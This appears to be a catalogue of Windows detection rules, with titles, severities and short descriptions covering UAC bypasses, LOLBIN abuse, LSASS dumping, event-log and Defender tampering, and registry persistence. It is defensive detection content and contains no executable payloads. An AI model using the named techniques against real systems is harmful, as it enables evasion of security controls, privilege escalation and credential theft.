Possible Privilege Escalation via Weak Service PermissionshighDetection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
Service StartupType Change Via Sc.EXEmediumDetect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
Service DACL Abuse To Hide Services Via Sc.EXEhighDetects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
Service Security Descriptor Tampering Via Sc.EXEmediumDetection of sc.exe utility adding a new service with special permission which hides that service.
Sdiagnhost Calling Suspicious Child ProcesshighDetects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Uncommon Child Process Of Setres.EXEhighDetects uncommon child process of Setres.EXE. Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution. It can potentially be abused in order to launch any arbitrary file with a name containing the word "choice" from the current execution path.
Setup16.EXE Execution With Custom .Lst FilemediumDetects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. These ".lst" file can contain references to external program that "Setup16.EXE" will execute. Attackers and adversaries might leverage this as a living of the land utility.
Uncommon Sigverif.EXE Child ProcessmediumDetects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.
Suspicious Splwow64 Without ParamshighDetects suspicious Splwow64.exe process without any command line parameters
Arbitrary File Download Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Process Proxy Execution Via Squirrel.EXEmediumDetects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
Program Executed Using Proxy/Local Command Via SSH.EXEmediumDetect usage of the "ssh.exe" binary as a proxy to launch other programs.
Execution via stordiag.exehighDetects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
Start of NT Virtual DOS MachinemediumNtvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
Execute From Alternate Data StreamsmediumDetects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
Potentially Suspicious Windows App ActivitymediumDetects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
Bad Opsec Defaults Sacrificial Processes With Improper ArgumentshighDetects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
Potential Commandline Obfuscation Using Escape CharactersmediumDetects potential commandline obfuscation using known escape characters
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious ImagehighDetects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
Potential Command Line Path Traversal Evasion AttemptmediumDetects potential evasion or obfuscation attempts using bogus path traversal via the commandline
Suspicious Copy From or To System DirectorymediumDetects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
LOL-Binary Copied From System DirectoryhighDetects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
Raccine UninstallhighDetects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
Suspicious Parent Double Extension File ExecutionhighDetect execution of suspicious double extension files in ParentCommandLine
DumpStack.log Defender EvasioncriticalDetects the use of the filename DumpStack.log to evade Microsoft Defender
Elevated System Shell Spawned From Uncommon Parent LocationmediumDetects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
ETW Logging Tamper In .NET Processes Via CommandLinehighDetects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4highDetects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
ETW Trace Evasion ActivityhighDetects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
Suspicious Eventlog Clearing or Configuration Change ActivityhighDetects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses.
Potentially Suspicious Execution From Parent Process In Public FolderhighDetects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
Process Execution From A Potentially Suspicious FolderhighDetects a potentially suspicious execution from an uncommon folder.
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLImediumDetects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
Writing Of Malicious Files To The Fonts FoldermediumMonitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
Potential Homoglyph Attack Using Lookalike CharactersmediumDetects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
Execution Of Non-Existing FilehighChecks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
LOLBIN Execution From Abnormal DrivemediumDetects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.
Potential File Download Via MS-AppInstaller Protocol HandlermediumDetects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
Execution of Suspicious File Type ExtensionmediumDetects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment.
Non-privileged Usage of Reg or PowershellhighSearch for usage of reg or Powershell by non-privileged users to modify service configuration in registry
Process Launched Without Image NamemediumDetect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
Potentially Suspicious Call To Win32_NTEventlogFile ClasshighDetects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
Use Short Name Path in Command LinemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
Use Short Name Path in ImagemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection
Use NTFS Short Name in Command LinemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection
Use NTFS Short Name in ImagemediumDetect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection
Suspicious Process ParentshighDetects suspicious parent processes that should not have any children or should only have a single possible child program
Potential PowerShell Execution Via DLLhighDetects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.
Windows Processes Suspicious Parent DirectorylowDetect suspicious parent processes of well-known Windows processes
Suspicious Process Execution From Fake Recycle.Bin FolderhighDetects process execution from a fake recycle bin folder, often used to avoid security solution.
Potential Defense Evasion Via Right-to-Left OverridehighDetects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This is used as an obfuscation and masquerading techniques.
Suspicious Service Binary DirectoryhighDetects a service binary running in a suspicious directory
Suspicious Windows Service TamperinghighDetects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
System File Execution Location AnomalyhighDetects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Shadow Copies Deletion Using Operating Systems UtilitieshighShadow Copies deletion using operating systems utilities
Windows Shell/Scripting Processes Spawning Suspicious ProgramshighDetects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
Suspicious SYSTEM User Process CreationhighDetects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
Tasks Folder EvasionhighThe Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Process Creation Using Sysnative FoldermediumDetects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
Suspicious Userinit Child ProcessmediumDetects a suspicious child process of userinit
Malicious Windows Script Components File Execution by TAEF DetectionlowWindows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
Malicious PE Execution by Microsoft Visual Studio DebuggermediumThere is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.
Weak or Abused Passwords In CLImediumDetects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline
Execution via WorkFolders.exehighDetects using WorkFolders.exe to execute an arbitrary control.exe
Suspect Svchost ActivityhighIt is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
Suspicious Process Masquerading As SvcHost.EXEhighDetects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
Uncommon Svchost Parent ProcessmediumDetects an uncommon svchost parent process
Potential Memory Dumping Activity Via LiveKDmediumDetects execution of LiveKD based on PE metadata or image name
Kernel Memory Dump Via LiveKDhighDetects execution of LiveKD with the "-m" flag to potentially dump the kernel memory
Procdump ExecutionmediumDetects usage of the SysInternals Procdump utility
Potential SysInternals ProcDump EvasionhighDetects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
Potential LSASS Process Dump Via ProcdumphighDetects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
Sysinternals PsSuspend Suspicious ExecutionhighDetects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
Sysmon Configuration UpdatemediumDetects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
Uninstall Sysinternals SysmonhighDetects the removal of Sysmon, which could be a potential attempt at defense evasion
Potential Binary Impersonating Sysinternals ToolsmediumDetects binaries that use the same name as legitimate sysinternals tools to evade detection
Potential Signing Bypass Via Windows Developer FeatureshighDetects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.
Suspicious Recursive TakeownmediumAdversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
Taskkill Symantec Endpoint ProtectionhighDetects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
Taskmgr as LOCAL_SYSTEMhighDetects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
New Process Created Via Taskmgr.EXElowDetects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
Bypass UAC via CMSTPhighDetect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
UAC Bypass Using Disk CleanuphighDetects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
UAC Bypass Using ChangePK and SLUIhighDetects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
CMSTP UAC Bypass via COM Object AccesshighDetects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
UAC Bypass Tools Using ComputerDefaultshighDetects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
UAC Bypass Using Consent and Comctl32 - ProcesshighDetects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
UAC Bypass Using DismHosthighDetects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
UAC Bypass Using Event Viewer RecentViewshighDetects the pattern of UAC Bypass using Event Viewer RecentViews
UAC Bypass Using NTFS Reparse Point - ProcesshighDetects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
UAC Bypass via ICMLuaUtilhighDetects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
UAC Bypass Using IDiagnostic ProfilehighDetects the "IDiagnosticProfileUAC" UAC bypass technique
UAC Bypass Using IEInstal - ProcesshighDetects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
UAC Bypass Using MSConfig Token Modification - ProcesshighDetects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
UAC Bypass Using PkgMgr and DISMhighDetects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
Potential UAC Bypass Via Sdclt.EXEmediumA General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
TrustedPath UAC Bypass PatterncriticalDetects indicators of a UAC bypass method by mocking directories
UAC Bypass Abusing Winsat Path Parsing - ProcesshighDetects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
UAC Bypass Using Windows Media Player - ProcesshighDetects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
Bypass UAC via WSReset.exehighDetects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.
UAC Bypass WSResethighDetects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Uninstall Crowdstrike Falcon SensorhighAdversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon
Verclsid.exe Runs COM ObjectmediumDetects when verclsid.exe is used to run COM object via GUID
Detect Virtualbox Driver Installation OR Starting Of VMslowAdversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
Suspicious VBoxDrvInst.exe ParametersmediumDetect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
Potentially Suspicious Child Process Of VsCodemediumDetects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
Potential Binary Proxy Execution Via VSDiagnostics.EXEmediumDetects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
Suspicious Vsls-Agent Command With AgentExtensionPath LoadmediumDetects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
Wab Execution From Non Default LocationhighDetects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity
Wab/Wabmig Unusual Parent Or Child ProcesseshighDetects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity
Potential ReflectDebugger Content Execution Via WerFault.EXEmediumDetects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
Suspicious Child Process Of Wermgr.EXEhighDetects suspicious Windows Error Reporting manager (wermgr.exe) child process
Add New Download Source To WingetmediumDetects usage of winget to add new additional download sources
Add Insecure Download Source To WingethighDetects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
Add Potential Suspicious New Download Source To WingetmediumDetects usage of winget to add new potentially suspicious download sources
Install New Package Via Winget Local ManifestmediumDetects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe, msi or msix files later.
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xslmediumDetects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Remote Code Execute via Winrm.vbs | medium | Detects an attempt to execute code or create a service on a remote host via winrm.vbs.
Wlrmdr.EXE Uncommon Argument Or Child Process | medium | Detects the execution of "Wlrmdr.exe" with the "-u" command line flag, which allows anything passed to it to be an argument of the ShellExecute API and would therefore allow an attacker to execute arbitrary binaries. This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that possess "ParentImage" telemetry.
Potential SquiblyTwo Technique Execution | medium | Detects potential SquiblyTwo attack technique with possibly renamed WMIC via Imphash and OriginalFileName fields
Suspicious WMIC Execution Via Office Process | high | Office application called wmic to proxy execution through a LOLBIN process. This is often used to break a suspicious parent-child chain (Office app spawns LOLBin).
Potential Tampering With Security Products Via WMIC | high | Detects uninstallation or termination of security products using the WMIC utility
XSL Script Execution Via WMIC.EXE | medium | Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.
Suspicious WmiPrvSE Child Process | high | Detects suspicious and uncommon child processes of WmiPrvSE
UEFI Persistence Via Wpbbin - ProcessCreation | high | Detects execution of the binary "wpbbin", which is used as part of the UEFI-based persistence method described in the reference section
WSL Child Process Anomaly | medium | Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
Windows Binary Executed From WSL | medium | Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships
Proxy Execution Via Wuauclt.EXE | high | Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Suspicious Windows Update Agent Empty Cmdline | high | Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
Xwizard.EXE Execution From Non-Default Location | high | Detects the execution of the Xwizard tool from a non-default directory. When executed from a non-default directory, this utility can be abused in order to sideload a custom version of "xwizards.dll".
COM Object Execution via Xwizard.EXE | medium | Detects the execution of the Xwizard tool with the "RunWizard" flag and a GUID-like argument. This utility can be abused in order to run a custom COM object created in the registry.
Potential Process Hollowing Activity | medium | Detects when a memory process image does not match the disk image, indicative of process hollowing.
Potential Defense Evasion Via Raw Disk Access By Uncommon Tools | low | Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts
Potential NetWire RAT Activity - Registry | high | Detects registry keys related to NetWire RAT
Folder Removed From Exploit Guard ProtectedFolders List - Registry | high | Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
Terminal Server Client Connection History Cleared - Registry | high | Detects the deletion of registry keys containing the MSTSC connection history
Removal Of AMSI Provider Registry Keys | high | Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
Removal of Potential COM Hijacking Registry Keys | medium | Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker, and the deletion could indicate steps to remove their tracks.
Removal Of Index Value to Hide Schedule Task - Registry | medium | Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides it from any tooling such as "schtasks /query"
Removal Of SD Value to Hide Schedule Task - Registry | medium | Removal of the SD (Security Descriptor) value in the \Schedule\TaskCache\Tree registry hive to hide a scheduled task. This technique is used by Tarrask malware
UAC Bypass Via Wsreset | high | Unfixed UAC bypass method on Windows 10. WSReset.exe is a file associated with the Windows Store. It will run a binary file specified in a low-privilege registry location.
CMSTP Execution Registry Event | high | Detects various indicators of Microsoft Connection Manager Profile Installer execution
Disable Security Events Logging Adding Reg Key MiniNt | high | Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.
Wdigest CredGuard Registry Modification | high | Detects potential malicious modification of the property value of IsCredGuardEnabled from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. This is usually used together with UseLogonCredential to manipulate credential caching.
Potential Qakbot Registry Activity | high | Detects a registry key used by IceID in a campaign that distributes malicious OneNote files
NetNTLM Downgrade Attack - Registry | high | Detects NetNTLM downgrade attack
New PortProxy Registry Entry Added | medium | Detects the modification of the PortProxy registry key, which is used for port forwarding.
RedMimicry Winnti Playbook Registry Manipulation | high | Detects actions caused by the RedMimicry Winnti playbook
Run Once Task Configuration in Registry | medium | Rule to detect the configuration of the Run Once registry key. The configured payload can be run by runonce.exe /AlternateShellStartup
Shell Open Registry Keys Manipulation | high | Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
Atbroker Registry Change | medium | Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback | medium | Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
Registry Persistence via Service in Safe Mode | high | Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
Allow RDP Remote Assistance Feature | medium | Detects enabling of the RDP Remote Assistance feature to allow a specific user to connect via RDP to the targeted machine
Potential AMSI COM Server Hijacking | high | Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionalities. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless
New BgInfo.EXE Custom DB Path Registry Configuration | medium | Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
New BgInfo.EXE Custom WMI Query Registry Configuration | medium | Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute a custom WMI query via "BgInfo.exe"
New BgInfo.EXE Custom VBScript Registry Configuration | medium | Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
Blackbyte Ransomware Registry | high | BlackByte sets three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption
Bypass UAC Using DelegateExecute | high | Bypasses User Account Control using a fileless method
Bypass UAC Using SilentCleanup Task | high | Detects the setting of the environment variable "windir" to a non-default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
Sysmon Driver Altitude Change | high | Detects changes in the Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
Change Winevt Channel Access Permission Via Registry | high | Detects tampering with the "ChannelAccess" registry key in order to change access to a Windows event channel.
ClickOnce Trust Prompt Tampering | medium | Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
Service Binary in Suspicious Folder | high | Detects the creation of a service with a service binary located in a suspicious directory
Custom File Open Handler Executes PowerShell | high | Detects the abuse of a custom file open handler executing PowerShell
Windows Defender Exclusions Added - Registry | medium | Detects the setting of Windows Defender exclusions
Potentially Suspicious Desktop Background Change Via Registry | medium | Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Antivirus Filter Driver Disallowed On Dev Drive - Registry | high | Detects activity that indicates a user disabling the ability of the antivirus minifilter driver to inspect a "Dev Drive".
Hypervisor Enforced Code Integrity Disabled | high | Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code into the kernel
Hypervisor Enforced Paging Translation Disabled | high | Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
DHCP Callout DLL Installation | high | Detects the installation of a Callout DLL via the CalloutDlls and CalloutEnabled parameters in the registry, which can be used to execute code in the context of the DHCP server (restart required)
Disable Exploit Guard Network Protection on Windows Defender | medium | Detects disabling of Windows Defender Exploit Guard Network Protection
Disable Administrative Share Creation at Startup | medium | Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
Disabled Windows Defender Eventlog | high | Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
Disable PUA Protection on Windows Defender | high | Detects disabling of Windows Defender PUA protection
Disable Tamper Protection on Windows Defender | medium | Detects disabling of Windows Defender Tamper Protection
Potential AutoLogger Sessions Tampering | high | Detects tampering with autologger trace sessions, which is a technique used by attackers to disable logging
Disable Microsoft Defender Firewall via Registry | medium | Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
Disable Internal Tools or Feature in Registry | medium | Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
Disable Macro Runtime Scan Scope | high | Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
Disable Privacy Settings Experience in Registry | medium | Detects registry modifications that disable the Privacy Settings Experience
Disable Windows Security Center Notifications | medium | Detects setting UseActionCenterExperience to 0 to disable Windows Security Center notifications
Windows Defender Service Disabled - Registry | high | Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry
Disable Windows Firewall by Registry | medium | Detects setting EnableFirewall to 0 to disable the Windows firewall
Disable Windows Event Logging Via Registry | high | Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
Add DisallowRun Execution to Registry | medium | Detects setting DisallowRun to 1 to prevent users from running specific programs
DNS-over-HTTPS Enabled by Registry | medium | Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or to hide the process of exfiltrating data. With this enabled, organizations lose visibility into data such as query type, response and originating IP that are used to identify bad actors.
New DNS ServerLevelPluginDll Installed | high | Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required)
ETW Logging Disabled In .NET Processes - Sysmon Registry | high | Potential adversaries stopping ETW providers from recording loaded .NET assemblies.
Enabling COR Profiler Environment Variables | medium | Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Potential EventLog File Location Tampering | high | Detects tampering with the EventLog service "file" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
Scripted Diagnostics Turn Off Check Enabled - Registry | medium | Detects enabling of TurnOffCheck, which can be used to bypass defenses against the MSDT Follina vulnerability
Suspicious Application Allowed Through Exploit Guard | high | Detects applications being added to the "allowed applications" list of Exploit Guard in order to bypass controlled folder settings
Change User Account Associated with the FAX Service | high | Detects a change of the user account associated with the FAX service to avoid the escalation problem.
Change the Fax Dll | high | Detects possible persistence via Fax DLL loading when the service restarts
New File Association Using Exefile | high | Detects the abuse of the exefile handler in a new file association. Used for bypass of security products.
Displaying Hidden Files Feature Disabled | medium | Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable the showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.
Registry Hide Function from User | medium | Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla and Hermetic Wiper use this technique)
Hide Schedule Task Via Index Value Tamper | high | Detects when the "index" value of a scheduled task is modified in the registry, which effectively hides it from any tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique)
Driver Added To Disallowed Images In HVCI - Registry | high | Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols | high | Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
Uncommon Extension In Keyboard Layout IME File Registry Value | high | Detects usage of the Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Suspicious Path In Keyboard Layout IME File Registry Value | high | Detects usage of the Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
Internet Explorer DisableFirstRunCustomize Enabled | medium | Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
